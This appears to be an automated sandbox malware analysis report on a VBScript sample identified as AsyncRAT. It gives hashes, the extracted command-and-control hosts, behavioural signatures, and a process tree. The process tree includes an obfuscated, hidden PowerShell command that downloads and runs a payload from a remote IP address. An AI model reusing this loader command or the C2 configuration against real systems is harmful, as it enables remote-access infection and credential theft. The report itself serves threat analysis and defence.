Analysis
-
max time kernel
259s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08-07-2024 17:53
Static task
static1
Behavioral task
behavioral1
Sample
fsp.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
fsp.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
fsp.vbs
Resource
win10v2004-20240704-en
General
-
Target
fsp.vbs
-
Size
10KB
-
MD5
c9f569bd4a2bdec00f03b7e30f47a8dd
-
SHA1
2cdd9694e58e8f3c9c8607f5cc6e31d10b482c32
-
SHA256
7b73596346a36f83b6b540bfc2b779fec228a050e6d7de631d0518b526b9b128
-
SHA512
98d631ad7749c3b7ebd02da6a00796f66951d42f9142fc1bb459904da253f8c90e974a491d4f1e1364f786a8ae8022080a24840260b01f73fd73e8c0fe9a54cd
-
SSDEEP
48:/L2tePUutEk+hDnqhdN6+W0K00ah0ZBjAPa:T2kPUGxwqhdN6l0K00xoi
Malware Config
Extracted
asyncrat
AWS | RxR
Hema
lolroot.duckdns.org:6606
lolroot.duckdns.org:7707
lolroot.duckdns.org:8808
storeroot.duckdns.org:6606
storeroot.duckdns.org:7707
storeroot.duckdns.org:8808
storexroot.duckdns.org:6606
storexroot.duckdns.org:7707
storexroot.duckdns.org:8808
AsyncMutex_9eurjf40i8eurjfiekfj
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2924-75-0x0000000007660000-0x0000000007740000-memory.dmp WebBrowserPassView -
Nirsoft 1 IoCs
resource yara_rule behavioral2/memory/2924-75-0x0000000007660000-0x0000000007740000-memory.dmp Nirsoft -
Blocklisted process makes network request 1 IoCs
flow pid Process 1 3088 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3088 powershell.exe 4572 powershell.exe 2312 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4572 set thread context of 2924 4572 powershell.exe 81 PID 2312 set thread context of 372 2312 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3088 powershell.exe 3088 powershell.exe 3088 powershell.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 2924 RegSvcs.exe 2312 powershell.exe 2312 powershell.exe 2312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3088 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 2924 RegSvcs.exe Token: SeDebugPrivilege 2312 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2924 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 3580 wrote to memory of 3752 3580 WScript.exe 74 PID 3580 wrote to memory of 3752 3580 WScript.exe 74 PID 3752 wrote to memory of 3088 3752 cmd.exe 76 PID 3752 wrote to memory of 3088 3752 cmd.exe 76 PID 4812 wrote to memory of 4544 4812 WScript.exe 78 PID 4812 wrote to memory of 4544 4812 WScript.exe 78 PID 4544 wrote to memory of 4572 4544 cmd.exe 80 PID 4544 wrote to memory of 4572 4544 cmd.exe 80 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 4572 wrote to memory of 2924 4572 powershell.exe 81 PID 1328 wrote to memory of 1732 1328 WScript.exe 84 PID 1328 wrote to memory of 1732 1328 WScript.exe 84 PID 1732 wrote to memory of 2312 1732 cmd.exe 86 PID 1732 wrote to memory of 2312 1732 cmd.exe 86 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 PID 2312 wrote to memory of 372 2312 powershell.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fsp.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2924
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:372
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
Filesize
1KB
MD54c4e36b006a0b8f591fb713188de2038
SHA1ddadb2994aed824a61eaa5a12db3c24e71b41554
SHA256ff9590fec79a6bccc0cd70f9ef88433d8407f7828b76643bbcc2dfe8974236b8
SHA512d7815b9298ab0ce0f5659f793160d97701d00ad97ddae62662df7f490aa7d0eddfbaa0f8f201076c66f2fc9a764ea656842d4e2d1ae5796ca674d23d7e9cde8e
-
Filesize
1KB
MD52e3068968e808528b95ab643cd87ebe2
SHA11e0ccfcc7a015132d105484da078644f9cc453a5
SHA2569942369b93614a6fe3daf4614a7c47813e2df827e69c34a2104eb9270442dced
SHA51239a04a5b9348fd3b285697df2063d2b8d0edd49f15468f5274702f78a679e99ed40006b26d84a6367ef8e7b8cc0ae7188c831b0a288265070b9a0d2b719cdad8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
195B
MD50344d401c7266a2bc6d19f5a2bc90040
SHA1d3bf5a4b55b523429f3c7cb58ffa19504bececfc
SHA256a3a38fb5090f5b9c951160d60d2fcd0e4488b3e72b1823fc17ef34a15fe9dab7
SHA51259b448d02dadd2934abf88c40e25fec741724112e1320770b06df9b862643f2eba9cedee9d58244145fbece6d0d366380d6d2d6b56082a97649683ca10f9bc07
-
Filesize
704KB
MD5ddf4e48ffb86d26dab3211c61fbfa860
SHA10a4b84e17fd68c86e11b37f1889a159408a12211
SHA256062254d6904583a767b6662a16977c7f90e0c16d08fbc499f2ee18a9a26af5ec
SHA512da62656a3c5468127304dea22c08f622b3b4bd703f3606619fdae3cddf182d80945358bda5ba87d1788cc9db7e48c8edacb36ff9c81e0d30935c85ece888ccd6
-
Filesize
686B
MD5a0a3c05080df4421295e559291304405
SHA1286e02a003b7e26a381e41d2127ffb0ed371f5b4
SHA25622889b8d447ea679e8b2fb27eca95d0f04056203c9214818758b0a21379ea323
SHA512ee9971cda442f9dd305e0810babd0a5f94589a966b2a4f10421b341d6e7914fed3f2a12821dc56d338f7ec5ba9a38830727d0e17fd18257e45ebabd7612e99b4